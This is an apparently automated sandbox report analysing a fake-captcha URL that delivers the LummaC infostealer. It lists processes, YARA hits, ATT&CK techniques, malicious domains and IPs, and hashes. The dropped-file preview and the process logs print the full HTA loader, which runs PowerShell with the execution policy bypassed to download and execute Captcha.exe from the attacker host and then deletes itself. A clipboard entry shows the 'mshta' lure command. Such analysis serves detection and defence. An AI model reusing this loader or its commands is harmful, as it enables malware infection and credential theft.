Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Captcha.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3472			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6286			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5368	Thread sleep time: -17524406870024063s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6336	Thread sleep time: -1844674407370954s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: powershell.exe, 0000000F.00000002.1606592111.0000000008794000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\i
Source: mshta.exe, 0000000D.00000003.1523553043.0000000000B69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000003.1525173070.0000000000B69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000002.1527291671.0000000000B69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000003.1526519185.0000000000B69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mshta.exe, 0000000D.00000002.1527169207.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000003.1525620928.0000000000B02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: powershell.exe, 0000000F.00000002.1587781228.0000000000E74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\=YE
Source: mshta.exe, 0000000D.00000003.1525620928.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000002.1527169207.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: powershell.exe, 0000000F.00000002.1587781228.0000000000E74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}5
Source: powershell.exe, 0000000F.00000002.1600722226.000000000741D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\mshta.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\ProgramData\Captcha.exe "C:\ProgramData\Captcha.exe"	Jump to behavior
Source: C:\ProgramData\Captcha.exe	Process created: C:\ProgramData\Captcha.exe none	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 17.2.Captcha.exe.1cba000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Captcha.exe.1cba000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Captcha.exe.1e66000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.Captcha.exe.1e66000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Captcha.exe.1e66000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.Captcha.exe.1d00000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.Captcha.exe.1e66000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2108416390.0000000001CBA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.1590701531.0000000001E66000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2108523278.0000000001E66000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.1590701531.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 17.2.Captcha.exe.1cba000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Captcha.exe.1cba000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Captcha.exe.1e66000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.Captcha.exe.1e66000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Captcha.exe.1e66000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.Captcha.exe.1d00000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.Captcha.exe.1e66000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2108416390.0000000001CBA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.1590701531.0000000001E66000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2108523278.0000000001E66000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.1590701531.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	3 Browser Extensions	11 Process Injection	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 PowerShell	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
C:\ProgramData\Captcha.exe	100%	Avira	TR/Redcap.lcybk
C:\ProgramData\Captcha.exe	39%	ReversingLabs	Win32.Spyware.Lummastealer

Name	IP	Active	Malicious	Antivirus Detection	Reputation
rea.grupolalegion.ec	190.92.154.206	true	false		high
www.google.com	142.250.186.36	true	false		high

Contacted URLs

Name	Malicious	Reputation
https://rea.grupolalegion.ec/p.php/1?js	true	unknown
phygcsforum.life	true	unknown
techmindzs.live	false	high
gadgethgfub.icu	false	high
https://rea.grupolalegion.ec/p.php/1	true	unknown
moderzysics.top	false	high
techspherxe.top	false	high
https://rea.grupolalegion.ec/Viber.exe	true	unknown
codxefusion.top	false	high
https://rea.grupolalegion.ec/p.php	true	unknown
culasova.icu	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 0000000F.00000002.1596466284.0000000005E1B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000F.00000002.1588798652.0000000004F16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1587781228.0000000000E52000.00000004.00000020.00020000.00000000.sdmp	false	high
http://rea.grupolalegion.ec	powershell.exe, 0000000F.00000002.1588798652.00000000058C1000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000F.00000002.1588798652.0000000004F16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1587781228.0000000000E52000.00000004.00000020.00020000.00000000.sdmp	false	high
https://go.micro	powershell.exe, 0000000F.00000002.1588798652.000000000559A000.00000004.00000800.00020000.00000000.sdmp	false	high
https://rea.grupolalegion.ec	powershell.exe, 0000000F.00000002.1588798652.0000000004F16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1588798652.000000000559A000.00000004.00000800.00020000.00000000.sdmp	true	unknown
https://rea.grupolalegion.ec/p.phpC:	mshta.exe, 0000000D.00000002.1526996208.00000000008D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000002.1527109411.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000003.1523461893.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://contoso.com/License	powershell.exe, 0000000F.00000002.1596466284.0000000005E1B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 0000000F.00000002.1596466284.0000000005E1B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://rea.grupolalegion.ec/p.php8	mshta.exe, 0000000D.00000002.1527109411.0000000000AE2000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://rea.grupolalegion.ec/p.phpcrosoft	mshta.exe, 0000000D.00000003.1525620928.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000002.1527169207.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://rea.grupolalegion.ec/p.phpEventt	mshta.exe, 0000000D.00000002.1527169207.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000003.1525620928.0000000000B02000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000F.00000002.1588798652.0000000004F16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1587781228.0000000000E52000.00000004.00000020.00020000.00000000.sdmp	false	high
https://rea.grupolalegion.ec/p.phpSSO	mshta.exe, 0000000D.00000002.1527432754.0000000002F70000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://rea.grupolalegion.ec/p.php...	mshta.exe, 0000000D.00000003.1523461893.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://rea.grupolalegion.ec/p.phpiF	mshta.exe, 0000000D.00000002.1527109411.0000000000AE2000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://crl.micro	powershell.exe, 0000000F.00000002.1587781228.0000000000E74000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://rea.grupolalegion.ec/p.phphttps://rea.grupolalegion.ec/p.php	mshta.exe, 0000000D.00000003.1526009844.00000000062E5000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://aka.ms/pscore6lB	powershell.exe, 0000000F.00000002.1588798652.0000000004DC1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://rea.grupolalegion.ec/	mshta.exe, 0000000D.00000003.1523553043.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000003.1525173070.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000002.1527261841.0000000000B57000.00000004.00000020.00020000.00000000.sdmp	true	unknown
https://rea.grupolalegion.ec/p.phpd	mshta.exe, 0000000D.00000002.1527169207.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000003.1525620928.0000000000B02000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://rea.grupolalegion.ec/p.php...o	mshta.exe, 0000000D.00000003.1525173070.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000003.1526519185.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000002.1527315608.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000003.1523461893.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://contoso.com/	powershell.exe, 0000000F.00000002.1596466284.0000000005E1B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 0000000F.00000002.1596466284.0000000005E1B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://rea.grupolalegion.ec/p.php%FVV	mshta.exe, 0000000D.00000002.1527109411.0000000000AE2000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000F.00000002.1588798652.0000000004DC1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://rea.grupolalegioH	powershell.exe, 0000000F.00000002.1588798652.000000000559A000.00000004.00000800.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
190.92.154.206	rea.grupolalegion.ec	Argentina	10986	DesarrollosDigitalesdePulsarConsultingAR	false
142.250.186.36	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false

Private

IP
192.168.2.7

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1631596
Start date and time:	2025-03-07 11:47:03 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://rea.grupolalegion.ec/p.php/1
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.evad.win@24/10@10/4
EGA Information:	Failed
HCA Information:	Successful, ratio: 80% Number of executed functions: 10 Number of non-executed functions: 189

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.16.195, 142.250.185.142, 173.194.76.84, 142.250.186.174, 142.250.186.142, 142.250.184.238, 199.232.210.172, 142.250.186.78, 216.58.212.142, 216.58.206.78, 142.250.184.227, 23.60.203.209, 13.107.246.67, 172.202.163.200
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, time.windows.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://rea.grupolalegion.ec/p.php/1

Simulations

Behavior and APIs

Time	Type	Description
07:08:04	API Interceptor	1x Sleep call for process: mshta.exe modified
07:08:05	API Interceptor	44x Sleep call for process: powershell.exe modified
13:08:00	Clipboard	Run: mshta https://rea.grupolalegion.ec/p.php

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2142592
Entropy (8bit):	6.657298705059237
Encrypted:	false
SSDEEP:	24576:KVdGH7WBRxQvLkkYLg0ZXntxSFdIqLoG22f7mfI5nBEyMJmyW+UZuWkLpR5SgFm7:KCxt6PAkC/1Zgvm48zpQk6zC
MD5:	05B7F29D1BAEAC0A7513D094BFC12A92
SHA1:	47B0C9C07259F686C956F663FED28F3814484D0A
SHA-256:	B311D9ACDE2A85424964D775779F3D9BA9FD4DB64A5595EC7AB64305F77C6A28
SHA-512:	1DABCDA5F7F8E32AE0E7FB2F88B61D0DB8BDBA749C89F6707426F4AB4942E398E8D5155D5CE251A26977E0C747F177ED3EE4AD7DD37AE0F776776F0630C5CE5A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........D...............(................... ....@...........................#......q!...@................................... .L..... .FA............ ..).... ......................................................!...............................text....'.......(.................. ..`.rdata.......@.......,..............@..@.data... .... ......................@....idata..L..... .....................@....reloc........ .....................@..B.symtab....... ......D.................B.rsrc...FA.... ..B...F..............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\p[1].htm

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	HTML document, ASCII text, with very long lines (693), with no line terminators
Category:	dropped
Size (bytes):	693
Entropy (8bit):	5.522043567403651
Encrypted:	false
SSDEEP:	12:haxJWWdoF2Hctgf2B8qJps8AV+FGkOKodE6Iy1M456VmpfBaLWal0VxOJlMM+RHO:ha/4AHctQ2B87+8TKoDgZV8BJa6VxOrb
MD5:	D1719DA179322B4243857F67C72CDAFD
SHA1:	BEAEAEAEC2BF1E0BED7FF921FAFB574D8DD9E32B
SHA-256:	6FEC9C5B0AF0BA477D75C7BC35571E3BC757B61B53260793425C7EA63228D084
SHA-512:	1B2B312D802B6D3601F62345CF931DB65429F17588F85BC2AB989B84A35E6DBA6DDDC5CF3AA200CD160AE1AE2D5DF89FAC2AF021A690B492A47E9BD20472A309
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE html><html><head><HTA:APPLICATION ID="CS" APPLICATIONNAME="Captcha" WINDOWSTATE="minimize" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" CAPTION="no" SHOWINTASKBAR="no"><script>new ActiveXObject("Wscript.Shell").Run("powershell -ep Bypass -nop -c \"Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\\ProgramData\\Captcha.exe; Start-Process 'C:\\ProgramData\\Captcha.exe'\"",0);var filename = window.location.href;filename = decodeURI(filename);filename = filename.replace("file:///", "");var fso = new ActiveXObject("Scripting.FileSystemObject");if(fso.FileExists(filename)){try{fso.DeleteFile(filename,true)}catch(e){}}window.close()</script></head><body></body></html>

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1300
Entropy (8bit):	5.3977927591921535
Encrypted:	false
SSDEEP:	24:3tWSKco4KmZjKbmOIld6lss4RPQoUP7mZ9t7J0gt/NK3R8QHia8H+:9WSU4xym/gv4RIoUP7mZ9tK8NWR8QHP
MD5:	A5CC65C702AF6F4F3D48AFEFD95BD1DC
SHA1:	278F913DF42FA9793A8A0F372D53B8B55E6F12FA
